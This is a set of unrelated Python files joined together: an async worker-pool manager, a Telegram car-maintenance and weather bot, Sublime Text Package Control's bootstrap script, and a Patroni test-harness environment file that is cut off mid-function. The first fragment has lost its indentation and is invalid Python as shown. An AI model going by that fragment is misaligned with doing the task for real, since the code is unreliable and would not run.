def get_worker_spec(
self,
name: t.Optional[str] = None,
daemon: t.Optional[bool] = None,
idle_timeout: t.Optional[float] = None,
wait_interval: t.Optional[float] = None,
max_task_count: t.Optional[int] = None,
max_err_count: t.Optional[int] = None,
max_cons_err_count: t.Optional[int] = None,
) -> AsyncWorkerSpec:
if name and name in self._current_tasks:
raise KeyError(f'Worker "{name}" exists.')
worker_spec = AsyncWorkerSpec(
name=coalesce(
name,
self._spec.worker_name_pattern.format(
manager=self._name,
worker=self._next_worker_seq(),
),
),
task_bus=self._task_bus,
request_bus=SimpleQueue(),
response_bus=self._response_bus,
daemon=coalesce(daemon, self._default_worker_spec.daemon),
idle_timeout=rectify(
coalesce(idle_timeout, self._default_worker_spec.idle_timeout),
self._default_worker_spec.idle_timeout,
),
wait_interval=rectify(
coalesce(wait_interval, self._default_worker_spec.wait_interval),
self._default_worker_spec.wait_interval,
),
max_task_count=rectify(
coalesce(max_task_count, self._default_worker_spec.max_task_count),
self._default_worker_spec.max_task_count,
),
max_err_count=rectify(
coalesce(max_err_count, self._default_worker_spec.max_err_count),
self._default_worker_spec.max_err_count,
),
max_cons_err_count=rectify(
coalesce(
max_cons_err_count, self._default_worker_spec.max_cons_err_count
),
self._default_worker_spec.max_cons_err_count,
),
)
return worker_spec
def _get_task_name(self, name: t.Optional[str] = None) -> str:
if name:
if name in self._current_tasks:
raise KeyError(f'Task "{name}" exists.')
return name
return coalesce(
name,
self._spec.task_name_pattern.format(
manager=self._name,
task=self._next_task_seq(),
),
)
def submit(
self,
fn: Function,
args: t.Optional[t.Iterable[t.Any]] = (),
kwargs: t.Optional[t.Dict[str, t.Any]] = None,
name: t.Optional[str] = None,
) -> Future:
if not self._state["running"]:
raise RuntimeError(
f'Manager "{self._name}" is either stopped or not started yet '
"and not able to accept tasks."
)
if not isasync(fn):
raise NotImplementedError(
f'Param "fn" ({fn}) is neither a coroutine nor a coroutine function.'
)
name = self._get_task_name(name)
future = Future()
task = AsyncTask(
name=name,
fn=fn,
args=args or (),
kwargs=kwargs or {},
future=future,
)
self._current_tasks[name] = task
self._task_bus.put(task)
self._adjust_workers()
return future
def _consume_response(self):
response: Action = self._response_bus.get()
response.task_name = t.cast(str, response.task_name)
response.worker_name = t.cast(str, response.worker_name)
if response.match(ACT_DONE, ACT_EXCEPTION):
self._current_tasks.pop(response.task_name)
if response.match(ACT_CLOSE):
self._current_workers.pop(response.worker_name)
elif response.match(ACT_RESTART):
worker = self._current_workers[response.worker_name]
worker.stop()
worker.start()
def _adjust_iterator(self) -> range:
    """Compute the range of new workers needed for the current backlog."""
    spec = self._spec
    if not (spec.incremental or spec.num_workers < 0):
        # Static pool: simply top up to the configured size.
        return range(len(self._current_workers), spec.num_workers)
    backlog = self._task_bus.qsize()
    idle = sum(1 for w in self._current_workers.values() if w.is_idle())
    if spec.num_workers < 0:
        # Unbounded pool: one worker per task that no idle worker can absorb.
        return range(backlog - idle)
    alive = len(self._current_workers)
    # Bounded incremental pool: grow toward the cap, but never past it.
    return range(alive, min(spec.num_workers, alive + backlog - idle))
def _adjust_workers(self):
    """Spawn workers until the pool size satisfies the spec."""
    # Fast path: nothing to do when the pool already matches the target.
    # Works for both incremental and static mode.
    if len(self._current_workers) == self._spec.num_workers:
        return
    for _ in self._adjust_iterator():
        fresh = AsyncWorker(self.get_worker_spec())
        self._current_workers[fresh._name] = fresh
        fresh.start()
|
bot.py | """
AUTO_BOT bot file
Developers: Andrey Kozlovsky, Stanislav Ermokhin
"""
import datetime
import schedule
import time
import telebot
from telebot import types
from threading import Thread
from config import API_TELEGRAM_TOKEN as TOKEN
import local_en as local
import wrapper_functions
import weather
# Number of leading seconds of the minute during which a scheduled
# notification may fire: the checker thread only wakes about once per
# second, so matching a single exact second could be missed.
SECONDS_TO_FETCH = 7
all_seconds = list(range(SECONDS_TO_FETCH))
# (hour, minute, second) triples at which send_notification() fires.
# FIX: the original `{(20, 2, all(all_seconds))}` called all() on a list
# containing 0, producing the single bogus entry (20, 2, False); expand to
# one tuple per allowed second instead.
TIMES = {(20, 2, s) for s in all_seconds}
bot = telebot.TeleBot(TOKEN)
user_in_database = wrapper_functions.user_in_database  # shorthand alias

# Inline-keyboard captions mapped (by position) to the wrapper_functions
# handler that stores the corresponding value.
process_functions_names = ['add_model', 'add_brand', 'add_year',
                           'add_oil', 'add_insurance', 'add_filter',
                           'add_tire', 'add_tech']
info_process_functions_names = ['add_username', 'add_city', 'add_email', 'add_password', 'add_phone']
my_commands = dict(zip(local.buttons_add_keyboard, process_functions_names))
user_info_commands = dict(zip(local.buttons_info_keyboard, info_process_functions_names))
def check_errors(msg, func):
    """Apply *func* to *msg* and report the outcome back to the chat.

    *func* returns a (success, error_text) pair.
    """
    result = func(msg)
    bot.send_message(msg.chat.id, local.success if result[0] else result[1])
def get_weather_info_on_id(chat_id):
    """Send a weather warning to *chat_id* only when the forecast looks bad."""
    city = wrapper_functions.get_city_by_chat(chat_id)
    watcher = weather.CityInfo(city=city)
    forecast = watcher.weather_forecast()
    description = forecast['weather'][0]['description']
    # NOTE(review): set.intersection(str) intersects with the string's
    # individual *characters*, not whole words -- confirm this is intended.
    if watcher.description_bad.intersection(description):
        bot.send_message(chat_id=chat_id, text=local.weather_warning + description)
def manual_get_weather_info_on_id(chat_id):
    """Send the current forecast description to *chat_id* unconditionally."""
    city = wrapper_functions.get_city_by_chat(chat_id)
    forecast = weather.CityInfo(city=city).weather_forecast()
    description = forecast['weather'][0]['description']
    bot.send_message(chat_id=chat_id, text=local.weather_warning + description)
def send_weather_notification(chat=None):
    """Notify one chat (when given) or every registered chat about weather."""
    if chat:
        manual_get_weather_info_on_id(chat)
        return
    for chat_id in wrapper_functions.get_all_chat_ids():
        get_weather_info_on_id(chat_id)
@bot.message_handler(commands=['weather'])
def send_on_help(message):
    """Handle /weather: send the requester their city's forecast."""
    send_weather_notification(chat=message.chat.id)
@bot.message_handler(commands=['start'])
def send_on_start(message):
    """Handle /start: greet a known user, or register a new one."""
    username = message.chat.username
    if user_in_database(username):
        bot.reply_to(message, local.welcome_back_message1 + username + local.welcome_back_message2)
        return
    created = wrapper_functions.add_username(message.chat)
    outcome = local.success if created[0] else local.error
    bot.reply_to(message, local.start_response_text + outcome)
@bot.message_handler(commands=['add'])
def send_on_add(message):
    """Handle /add: show the inline keyboard of addable attributes."""
    if not user_in_database(message.chat.username):
        bot.reply_to(message, local.error_not_in_database)
        return
    markup = types.InlineKeyboardMarkup(row_width=1)
    for caption in local.buttons_add_keyboard:
        markup.add(types.InlineKeyboardButton(caption, callback_data=caption))
    bot.send_message(message.chat.id,
                     local.explain_add_response,
                     reply_markup=markup)
@bot.message_handler(commands=['my_info'])
def send_on_info(message):
    """Handle /my_info: show the inline keyboard of user-profile fields."""
    if not user_in_database(message.chat.username):
        bot.reply_to(message, local.error_not_in_database)
        return
    markup = types.InlineKeyboardMarkup(row_width=1)
    for caption in local.buttons_info_keyboard:
        markup.add(types.InlineKeyboardButton(caption, callback_data=caption))
    bot.send_message(message.chat.id,
                     local.explain_info_response,
                     reply_markup=markup)
@bot.callback_query_handler(func=lambda call: call.data in my_commands or
                            call.data in user_info_commands or local.okay in call.data)
def get_on_add(call):
    """Dispatch inline-keyboard callbacks: value prompts and 'okay' acks."""
    try:
        if not call.message:
            raise Exception('call.message is None/False')  # debugging
        data = call.data
        if data in my_commands or data in user_info_commands:
            # Both command maps behave identically: prompt for a value and
            # feed the user's reply to the matching wrapper function.
            table = my_commands if data in my_commands else user_info_commands
            prompt = bot.reply_to(call.message, local.give_value)
            handler = getattr(wrapper_functions, table[data])
            bot.register_next_step_handler(prompt, lambda m: check_errors(m, handler))
        elif local.okay in data:
            # Acknowledge a maintenance notification: data is "<okay> <key>".
            prefix = local.okay + ' '
            key = data[len(prefix):]
            bot.send_message(call.message.chat.id,
                             text=local.okay_response + ': ' + key)
            updated = wrapper_functions.update_after_notification(call.message, [key])
            if updated:
                bot.send_message(call.message.chat.id,
                                 text=local.success)
            else:
                bot.send_message(call.message.chat.id, text=local.error)
    except Exception as e:
        # sending error message to bot for debugging ----------------
        bot.send_message(call.message.chat.id, local.error + '\n' + str(e))
        # -----------------------------------------------------------
def schedule_checker():
    """Background loop: run due scheduled jobs, polling every second.

    NOTE(review): the ``schedule`` module keeps a single global job
    registry, so this thread and schedule_checker_weather() both run *all*
    pending jobs -- confirm the jobs tolerate firing from either thread.
    """
    while True:
        schedule.run_pending()
        time.sleep(1)
def schedule_checker_weather():
    """Background loop: run due scheduled jobs, polling every 10 seconds.

    NOTE(review): runs the same global ``schedule`` registry as
    schedule_checker(); jobs may be triggered by either thread.
    """
    while True:
        schedule.run_pending()
        time.sleep(10)
def send_notification():
    """Push maintenance reminders to every chat when the clock matches TIMES."""
    now = datetime.datetime.now().timetuple()
    current_time = (now.tm_hour, now.tm_min, now.tm_sec)
    if current_time not in TIMES:  # time check -----
        return
    for chat_id in wrapper_functions.get_all_chat_ids():
        due = wrapper_functions.check_notification(chat_id=chat_id)
        if due['type'] == [''] * len(due['type']):
            # Nothing due for this chat.
            continue
        markup_okay = types.InlineKeyboardMarkup(row_width=1)
        for item in due['type']:
            label = local.okay + ' ' + local.types_dict[item]
            markup_okay.add(types.InlineKeyboardButton(text=label,
                                                       callback_data=label))
        bot.send_message(chat_id=chat_id,
                         reply_markup=markup_okay,
                         text=local.notify_okay)
# Fire send_notification every second; the TIMES membership check inside
# it gates the actual send.  (every 1 second) or (every 24 hours and clear time check)
schedule.every(1).seconds.do(send_notification)
t1 = Thread(target=schedule_checker)
t1.daemon = True  # FIX: Thread.setDaemon() is deprecated since Python 3.10
t1.start()
# Weather polling interval respects the weather API rate limit.
schedule.every(10).minutes.do(send_weather_notification)
t2 = Thread(target=schedule_checker_weather)
t2.daemon = True
t2.start()
# Run every job once at startup so users get an immediate update.
schedule.run_all()
@bot.message_handler(content_types=['text'])
def text_test_run(message):
    """Catch-all text handler used for debugging/test reachability checks."""
    bot.send_message(message.chat.id, 'Reached function text_test_run')


# Start the long-polling loop (blocks the main thread).
bot.polling()
|
bootstrap.py | import sys
import threading
import os
from textwrap import dedent
import sublime
# Clean up the installed and pristine packages for Package Control 2 to
# prevent a downgrade from happening via Sublime Text
if sys.version_info < (3,):
    # Sublime Text 2 (Python 2): remove PC2-era package archives.
    sublime_dir = os.path.dirname(sublime.packages_path())
    pristine_dir = os.path.join(sublime_dir, 'Pristine Packages')
    installed_dir = os.path.join(sublime_dir, 'Installed Packages')
    pristine_file = os.path.join(pristine_dir, 'Package Control.sublime-package')
    installed_file = os.path.join(installed_dir, 'Package Control.sublime-package')
    if os.path.exists(pristine_file):
        os.remove(pristine_file)
    if os.path.exists(installed_file):
        os.remove(installed_file)

# Make sure we have recent code in memory
reloader_name = 'package_control.reloader'
if sys.version_info >= (3,):
    # ST3 namespaces packages under their package-folder name.
    reloader_name = 'Package Control.' + reloader_name
    # NOTE(review): the `imp` module was removed in Python 3.12; fine for
    # the interpreter bundled with Sublime Text, but worth confirming.
    from imp import reload
if reloader_name in sys.modules:
    reload(sys.modules[reloader_name])

# ST3 loads packages as real packages (relative imports work); ST2 does not.
if sys.version_info < (3,):
    from package_control.bootstrap import bootstrap_dependency
    from package_control.package_manager import PackageManager
    from package_control import loader
    from package_control.settings import pc_settings_filename, load_list_setting, save_list_setting
else:
    from .package_control.bootstrap import bootstrap_dependency
    from .package_control.package_manager import PackageManager
    from .package_control import loader
    from .package_control.settings import pc_settings_filename, load_list_setting, save_list_setting
def plugin_loaded():
    """Bootstrap Package Control on startup.

    Writes the "00 package_control" loader package (if missing), records
    Package Control in the user's installed_packages setting, and kicks
    off background installation of the platform-specific _ssl dependency
    where the bundled Python lacks it.
    """
    manager = PackageManager()
    settings = manager.settings.copy()

    # Write the loader package that puts the package_control subdirectory
    # first on sys.path so every other package can rely on PC utilities.
    if not os.path.exists(loader.loader_package_path):
        base_loader_code = """
            import sys
            import os
            from os.path import dirname


            # This file adds the package_control subdirectory of Package Control
            # to first in the sys.path so that all other packages may rely on
            # PC for utility functions, such as event helpers, adding things to
            # sys.path, downloading files from the internet, etc


            if sys.version_info >= (3,):
                def decode(path):
                    return path

                def encode(path):
                    return path

                loader_dir = dirname(__file__)

            else:
                def decode(path):
                    if not isinstance(path, unicode):
                        path = path.decode(sys.getfilesystemencoding())
                    return path

                def encode(path):
                    if isinstance(path, unicode):
                        path = path.encode(sys.getfilesystemencoding())
                    return path

                loader_dir = decode(os.getcwd())

            st_dir = dirname(dirname(loader_dir))

            found = False
            if sys.version_info >= (3,):
                installed_packages_dir = os.path.join(st_dir, u'Installed Packages')
                pc_package_path = os.path.join(installed_packages_dir, u'Package Control.sublime-package')
                if os.path.exists(encode(pc_package_path)):
                    found = True

            if not found:
                packages_dir = os.path.join(st_dir, u'Packages')
                pc_package_path = os.path.join(packages_dir, u'Package Control')
                if os.path.exists(encode(pc_package_path)):
                    found = True

            if found:
                if os.name == 'nt':
                    from ctypes import windll, create_unicode_buffer
                    buf = create_unicode_buffer(512)
                    if windll.kernel32.GetShortPathNameW(pc_package_path, buf, len(buf)):
                        pc_package_path = buf.value

                sys.path.insert(0, encode(pc_package_path))
                import package_control
                # We remove the import path right away so as not to screw up
                # Sublime Text and its import machinery
                sys.path.remove(encode(pc_package_path))

            else:
                print(u'Package Control: Error finding main directory from loader')
        """
        base_loader_code = dedent(base_loader_code)
        loader.add('00', 'package_control', base_loader_code)

    pc_settings = sublime.load_settings(pc_settings_filename())

    # Make sure we are tracking Package Control itself
    installed_packages = load_list_setting(pc_settings, 'installed_packages')
    if 'Package Control' not in installed_packages:
        installed_packages.append('Package Control')
        save_list_setting(pc_settings, pc_settings_filename(), 'installed_packages', installed_packages)

    # We no longer use the installed_dependencies setting because it is not
    # necessary and created issues with settings shared across operating systems
    if pc_settings.get('installed_dependencies'):
        pc_settings.erase('installed_dependencies')
        sublime.save_settings(pc_settings_filename())

    # SSL support for Linux
    if sublime.platform() == 'linux':
        linux_ssl_url = u'http://packagecontrol.io/ssl/1.0.1/ssl-linux.sublime-package'
        linux_ssl_hash = u'862d061cbe666777cd1e9cd1cbc7c82f48ad8897dbb68332975f3edf5ce0f38d'
        linux_ssl_priority = u'01'
        linux_ssl_version = '1.0.1'

        def linux_ssl_show_restart():
            sublime.message_dialog(u'Package Control\n\n'
                u'Package Control just installed or upgraded the missing ' + \
                u'Python _ssl module for Linux since Sublime Text does not ' + \
                u'include it.\n\n' + \
                u'Please restart Sublime Text to make SSL available to all ' + \
                u'packages.')

        linux_ssl_args = (settings, linux_ssl_url,
            linux_ssl_hash, linux_ssl_priority, linux_ssl_version, linux_ssl_show_restart)
        threading.Thread(target=bootstrap_dependency, args=linux_ssl_args).start()

    # SSL support for SHA-2 certificates with ST2 on Windows
    if sublime.platform() == 'windows' and sys.version_info < (3,):
        win_ssl_url = u'http://packagecontrol.io/ssl/1.0.0/ssl-windows.sublime-package'
        win_ssl_hash = u'3c28982eb400039cfffe53d38510556adead39ba7321f2d15a6770d3ebc75030'
        win_ssl_priority = u'01'
        win_ssl_version = u'1.0.0'

        def win_ssl_show_restart():
            sublime.message_dialog(u'Package Control\n\n'
                u'Package Control just upgraded the Python _ssl module for ' + \
                u'ST2 on Windows because the bundled one does not include ' + \
                u'support for modern SSL certificates.\n\n' + \
                u'Please restart Sublime Text to complete the upgrade.')

        win_ssl_args = (settings, win_ssl_url, win_ssl_hash,
            win_ssl_priority, win_ssl_version, win_ssl_show_restart)
        threading.Thread(target=bootstrap_dependency, args=win_ssl_args).start()
# ST2 compat
if sys.version_info < (3,):
    # Sublime Text 2 never calls plugin_loaded(); invoke it at import time.
    plugin_loaded()
|
environment.py | import abc
import consul
import datetime
import etcd
import kazoo.client
import kazoo.exceptions
import os
import psutil
import psycopg2
import json
import shutil
import signal
import six
import subprocess
import sys
import tempfile
import threading
import time
import yaml
@six.add_metaclass(abc.ABCMeta)
class AbstractController(object):
    """Base class for managing one external process in the behave harness.

    Subclasses implement _start() (spawn the process) and _is_accessible()
    (probe readiness); this class handles lifecycle, logging and timeouts.
    """

    def __init__(self, context, name, work_directory, output_dir):
        self._context = context
        self._name = name
        self._work_directory = work_directory
        self._output_dir = output_dir
        self._handle = None  # subprocess.Popen handle once started
        self._log = None     # file the child's stdout/stderr is piped into

    def _has_started(self):
        # poll() returns None while the child is still alive.
        return self._handle and self._handle.pid and self._handle.poll() is None

    def _is_running(self):
        return self._has_started()

    @abc.abstractmethod
    def _is_accessible(self):
        """process is accessible for queries"""

    @abc.abstractmethod
    def _start(self):
        """start process"""

    def start(self, max_wait_limit=5):
        """Start the process and wait until it answers queries.

        :raises AssertionError: if the process dies immediately or is not
            accessible within ``max_wait_limit`` (scaled) seconds.
        """
        if self._is_running():
            return True
        self._log = open(os.path.join(self._output_dir, self._name + '.log'), 'a')
        self._handle = self._start()
        assert self._has_started(), "Process {0} is not running after being started".format(self._name)

        max_wait_limit *= self._context.timeout_multiplier
        # FIX: int() guards against a float timeout_multiplier, which would
        # make range() raise TypeError.
        for _ in range(int(max_wait_limit)):
            if self._is_accessible():
                break
            time.sleep(1)
        else:
            assert False,\
                "{0} instance is not available for queries after {1} seconds".format(self._name, max_wait_limit)

    def stop(self, kill=False, timeout=15, _=False):
        """Terminate the process, escalating to kill after *timeout* seconds."""
        term = False
        start_time = time.time()
        timeout *= self._context.timeout_multiplier
        while self._handle and self._is_running():
            if kill:
                self._handle.kill()
            elif not term:
                self._handle.terminate()
                term = True
            time.sleep(1)
            if not kill and time.time() - start_time > timeout:
                kill = True
        if self._log:
            self._log.close()

    def cancel_background(self):
        # Hook for subclasses that keep cancelable background activities.
        pass
class PatroniController(AbstractController):
    """Starts and stops individual patronis (one controller per instance)."""

    __PORT = 5360             # base port; each new instance bumps it by one
    PATRONI_CONFIG = '{}.yml'  # per-instance config filename pattern

    def __init__(self, context, name, work_directory, output_dir, custom_config=None):
        super(PatroniController, self).__init__(context, 'patroni_' + name, work_directory, output_dir)
        PatroniController.__PORT += 1
        self._data_dir = os.path.join(work_directory, 'data', name)
        self._connstring = None
        if custom_config and 'watchdog' in custom_config:
            # Replace the requested watchdog with the fifo-based test monitor.
            self.watchdog = WatchdogMonitor(name, work_directory, output_dir)
            custom_config['watchdog'] = {'driver': 'testing', 'device': self.watchdog.fifo_path, 'mode': 'required'}
        else:
            self.watchdog = None

        self._scope = (custom_config or {}).get('scope', 'batman')
        self._config = self._make_patroni_test_config(name, custom_config)
        self._closables = []  # ProcessHang objects to cancel on cleanup

        self._conn = None
        self._curs = None

    def write_label(self, content):
        with open(os.path.join(self._data_dir, 'label'), 'w') as f:
            f.write(content)

    def read_label(self):
        """Return the label file's contents, or None when it doesn't exist."""
        try:
            with open(os.path.join(self._data_dir, 'label'), 'r') as f:
                return f.read().strip()
        except IOError:
            return None

    @staticmethod
    def recursive_update(dst, src):
        # Deep-merge src into dst, descending into nested dicts.
        for k, v in src.items():
            if k in dst and isinstance(dst[k], dict):
                PatroniController.recursive_update(dst[k], v)
            else:
                dst[k] = v

    def update_config(self, custom_config):
        """Deep-merge *custom_config* into the on-disk YAML config."""
        with open(self._config) as r:
            config = yaml.safe_load(r)
        self.recursive_update(config, custom_config)
        with open(self._config, 'w') as w:
            yaml.safe_dump(config, w, default_flow_style=False)
        self._scope = config.get('scope', 'batman')

    def add_tag_to_config(self, tag, value):
        self.update_config({'tags': {tag: value}})

    def _start(self):
        if self.watchdog:
            self.watchdog.start()
        if isinstance(self._context.dcs_ctl, KubernetesController):
            # self._name is 'patroni_<name>'; [8:] strips the prefix.
            self._context.dcs_ctl.create_pod(self._name[8:], self._scope)
            os.environ['PATRONI_KUBERNETES_POD_IP'] = '10.0.0.' + self._name[-1]
        # Run under coverage so behave runs contribute to the coverage report.
        return subprocess.Popen([sys.executable, '-m', 'coverage', 'run',
                                 '--source=patroni', '-p', 'patroni.py', self._config],
                                stdout=self._log, stderr=subprocess.STDOUT, cwd=self._work_directory)

    def stop(self, kill=False, timeout=15, postgres=False):
        if postgres:
            # Stop only the managed PostgreSQL, leaving Patroni itself alive.
            return subprocess.call(['pg_ctl', '-D', self._data_dir, 'stop', '-mi', '-w'])
        super(PatroniController, self).stop(kill, timeout)
        if isinstance(self._context.dcs_ctl, KubernetesController):
            self._context.dcs_ctl.delete_pod(self._name[8:])
        if self.watchdog:
            self.watchdog.stop()

    def _is_accessible(self):
        cursor = self.query("SELECT 1", fail_ok=True)
        if cursor is not None:
            cursor.execute("SET synchronous_commit TO 'local'")
            return True

    def _make_patroni_test_config(self, name, custom_config):
        """Derive a per-instance config from <name>.yml; return its new path."""
        patroni_config_name = self.PATRONI_CONFIG.format(name)
        patroni_config_path = os.path.join(self._output_dir, patroni_config_name)

        with open(patroni_config_name) as f:
            config = yaml.safe_load(f)
        config.pop('etcd', None)

        host = config['postgresql']['listen'].split(':')[0]
        config['postgresql']['listen'] = config['postgresql']['connect_address'] = '{0}:{1}'.format(host, self.__PORT)

        config['name'] = name
        config['postgresql']['data_dir'] = self._data_dir
        config['postgresql']['use_unix_socket'] = True
        config['postgresql']['parameters'].update({
            'logging_collector': 'on', 'log_destination': 'csvlog', 'log_directory': self._output_dir,
            'log_filename': name + '.log', 'log_statement': 'all', 'log_min_messages': 'debug1',
            'unix_socket_directories': self._data_dir})

        if 'bootstrap' in config:
            config['bootstrap']['post_bootstrap'] = 'psql -w -c "SELECT 1"'
            if 'initdb' in config['bootstrap']:
                config['bootstrap']['initdb'].extend([{'auth': 'md5'}, {'auth-host': 'md5'}])

        if custom_config is not None:
            self.recursive_update(config, custom_config)

        if config['postgresql'].get('callbacks', {}).get('on_role_change'):
            # Pass the port so the callback can identify this instance.
            config['postgresql']['callbacks']['on_role_change'] += ' ' + str(self.__PORT)

        with open(patroni_config_path, 'w') as f:
            yaml.safe_dump(config, f, default_flow_style=False)

        user = config['postgresql'].get('authentication', config['postgresql']).get('superuser', {})
        self._connkwargs = {k: user[n] for n, k in [('username', 'user'), ('password', 'password')] if n in user}
        self._connkwargs.update({'host': host, 'port': self.__PORT, 'database': 'postgres'})

        self._replication = config['postgresql'].get('authentication', config['postgresql']).get('replication', {})
        self._replication.update({'host': host, 'port': self.__PORT, 'database': 'postgres'})

        return patroni_config_path

    def _connection(self):
        # Lazily (re)connect; closed != 0 means the connection was dropped.
        if not self._conn or self._conn.closed != 0:
            self._conn = psycopg2.connect(**self._connkwargs)
            self._conn.autocommit = True
        return self._conn

    def _cursor(self):
        if not self._curs or self._curs.closed or self._curs.connection.closed != 0:
            self._curs = self._connection().cursor()
        return self._curs

    def query(self, query, fail_ok=False):
        """Execute *query*; return the cursor, or None on error when fail_ok."""
        try:
            cursor = self._cursor()
            cursor.execute(query)
            return cursor
        except psycopg2.Error:
            if not fail_ok:
                raise

    def check_role_has_changed_to(self, new_role, timeout=10):
        """Poll pg_is_in_recovery() until it matches *new_role* or timeout."""
        bound_time = time.time() + timeout
        recovery_status = new_role != 'primary'
        while time.time() < bound_time:
            cur = self.query("SELECT pg_is_in_recovery()", fail_ok=True)
            if cur:
                row = cur.fetchone()
                if row and row[0] == recovery_status:
                    return True
            time.sleep(1)
        return False

    def get_watchdog(self):
        return self.watchdog

    def _get_pid(self):
        # Postmaster PID from the data directory, or None if unavailable.
        try:
            pidfile = os.path.join(self._data_dir, 'postmaster.pid')
            if not os.path.exists(pidfile):
                return None
            return int(open(pidfile).readline().strip())
        except Exception:
            return None

    def database_is_running(self):
        pid = self._get_pid()
        if not pid:
            return False
        try:
            os.kill(pid, 0)  # signal 0 only checks process existence
        except OSError:
            return False
        return True

    def patroni_hang(self, timeout):
        """SIGSTOP the Patroni process itself for up to *timeout* seconds."""
        hang = ProcessHang(self._handle.pid, timeout)
        self._closables.append(hang)
        hang.start()

    def checkpoint_hang(self, timeout):
        """SIGSTOP the checkpointer child process; return False if not found."""
        pid = self._get_pid()
        if not pid:
            return False
        proc = psutil.Process(pid)
        for child in proc.children():
            if 'checkpoint' in child.cmdline()[0]:
                checkpointer = child
                break
        else:
            return False
        hang = ProcessHang(checkpointer.pid, timeout)
        self._closables.append(hang)
        hang.start()
        return True

    def cancel_background(self):
        for obj in self._closables:
            obj.close()
        self._closables = []

    def terminate_backends(self):
        """Terminate client backends, sparing the named postgres workers."""
        pid = self._get_pid()
        if not pid:
            return False
        proc = psutil.Process(pid)
        for p in proc.children():
            if 'process' not in p.cmdline()[0]:
                p.terminate()

    @property
    def backup_source(self):
        # Replication DSN for pg_basebackup-style tools.
        return 'postgres://{username}:{password}@{host}:{port}/{database}'.format(**self._replication)

    def backup(self, dest='basebackup'):
        subprocess.call([PatroniPoolController.BACKUP_SCRIPT, '--walmethod=none',
                         '--datadir=' + os.path.join(self._output_dir, dest),
                         '--dbname=' + self.backup_source])
class ProcessHang(object):
    """Pause a process with SIGSTOP for up to *timeout* seconds.

    Runs in a background thread; close() cancels the hang early.  The
    process is always resumed with SIGCONT, even on cancellation.
    """

    def __init__(self, pid, timeout):
        self.pid = pid
        self.timeout = timeout
        self._stop_event = threading.Event()
        self._thread = threading.Thread(target=self.run)

    def start(self):
        self._thread.start()

    def run(self):
        os.kill(self.pid, signal.SIGSTOP)
        try:
            # Wake early when close() sets the event.
            self._stop_event.wait(self.timeout)
        finally:
            os.kill(self.pid, signal.SIGCONT)

    def close(self):
        self._stop_event.set()
        self._thread.join()
class AbstractDcsController(AbstractController):
    """Common base for DCS (etcd/consul/zookeeper/...) test controllers."""

    _CLUSTER_NODE = '/service/{0}'

    def __init__(self, context, mktemp=True):
        work_directory = tempfile.mkdtemp() if mktemp else None
        super(AbstractDcsController, self).__init__(context, self.name(), work_directory, context.pctl.output_dir)

    def _is_accessible(self):
        return self._is_running()

    def stop(self, kill=False, timeout=15):
        """Terminate the process and wipe the temp work directory we created."""
        super(AbstractDcsController, self).stop(kill=kill, timeout=timeout)
        if self._work_directory:
            shutil.rmtree(self._work_directory)

    def path(self, key=None, scope='batman'):
        suffix = '/' + key if key else ''
        return self._CLUSTER_NODE.format(scope) + suffix

    @abc.abstractmethod
    def query(self, key, scope='batman'):
        """ query for a value of a given key """

    @abc.abstractmethod
    def cleanup_service_tree(self):
        """ clean all contents stored in the tree used for the tests """

    @classmethod
    def get_subclasses(cls):
        """Yield all transitive subclasses, depth first."""
        for child in cls.__subclasses__():
            for grandchild in child.get_subclasses():
                yield grandchild
            yield child

    @classmethod
    def name(cls):
        # e.g. 'EtcdController' -> 'etcd' (drops the 'Controller' suffix).
        return cls.__name__[:-10].lower()
class ConsulController(AbstractDcsController):
    """Controller for a local Consul agent used as the DCS under test."""

    def __init__(self, context):
        super(ConsulController, self).__init__(context)
        os.environ['PATRONI_CONSUL_HOST'] = 'localhost:8500'
        os.environ['PATRONI_CONSUL_REGISTER_SERVICE'] = 'on'
        self._client = consul.Consul()
        self._config_file = None

    def _start(self):
        # Write a minimal single-node bootstrap config next to the work dir.
        self._config_file = self._work_directory + '.json'
        with open(self._config_file, 'wb') as f:
            f.write(b'{"session_ttl_min":"5s","server":true,"bootstrap":true,"advertise_addr":"127.0.0.1"}')
        return subprocess.Popen(['consul', 'agent', '-config-file', self._config_file, '-data-dir',
                                 self._work_directory], stdout=self._log, stderr=subprocess.STDOUT)

    def stop(self, kill=False, timeout=15):
        super(ConsulController, self).stop(kill=kill, timeout=timeout)
        if self._config_file:
            os.unlink(self._config_file)

    def _is_running(self):
        # A reachable agent with an elected leader counts as "running".
        try:
            return bool(self._client.status.leader())
        except Exception:
            return False

    def path(self, key=None, scope='batman'):
        # Consul KV keys must not start with '/'.
        return super(ConsulController, self).path(key, scope)[1:]

    def query(self, key, scope='batman'):
        _, value = self._client.kv.get(self.path(key, scope))
        return value and value['Value'].decode('utf-8')

    def cleanup_service_tree(self):
        self._client.kv.delete(self.path(scope=''), recurse=True)

    def start(self, max_wait_limit=15):
        # Consul needs longer than the default 5s to elect itself leader.
        super(ConsulController, self).start(max_wait_limit)
class EtcdController(AbstractDcsController):
    """ handles all etcd related tasks, used for the tests setup and cleanup """

    def __init__(self, context):
        super(EtcdController, self).__init__(context)
        os.environ['PATRONI_ETCD_HOST'] = 'localhost:2379'
        self._client = etcd.Client(port=2379)

    def _start(self):
        return subprocess.Popen(["etcd", "--debug", "--data-dir", self._work_directory],
                                stdout=self._log, stderr=subprocess.STDOUT)

    def query(self, key, scope='batman'):
        """Return the value stored at *key*, or None when it doesn't exist."""
        try:
            return self._client.get(self.path(key, scope)).value
        except etcd.EtcdKeyNotFound:
            return None

    def cleanup_service_tree(self):
        try:
            self._client.delete(self.path(scope=''), recursive=True)
        except (etcd.EtcdKeyNotFound, etcd.EtcdConnectionFailed):
            # Nothing to clean up, or etcd is already gone -- both are fine.
            return
        except Exception as e:
            assert False, "exception when cleaning up etcd contents: {0}".format(e)

    def _is_running(self):
        # if etcd is running, but we didn't start it
        try:
            return bool(self._client.machines)
        except Exception:
            return False
class KubernetesController(AbstractDcsController):
    """DCS controller backed by a Kubernetes cluster (pods + endpoints)."""

    def __init__(self, context):
        super(KubernetesController, self).__init__(context)
        self._namespace = 'default'
        self._labels = {"application": "patroni"}
        self._label_selector = ','.join('{0}={1}'.format(k, v) for k, v in self._labels.items())
        os.environ['PATRONI_KUBERNETES_LABELS'] = json.dumps(self._labels)
        os.environ['PATRONI_KUBERNETES_USE_ENDPOINTS'] = 'true'

        from kubernetes import client as k8s_client, config as k8s_config
        k8s_config.load_kube_config(context='local')
        self._client = k8s_client
        self._api = self._client.CoreV1Api()

    def _start(self):
        # The cluster itself is managed externally; nothing to spawn.
        pass

    def create_pod(self, name, scope):
        labels = self._labels.copy()
        labels['cluster-name'] = scope
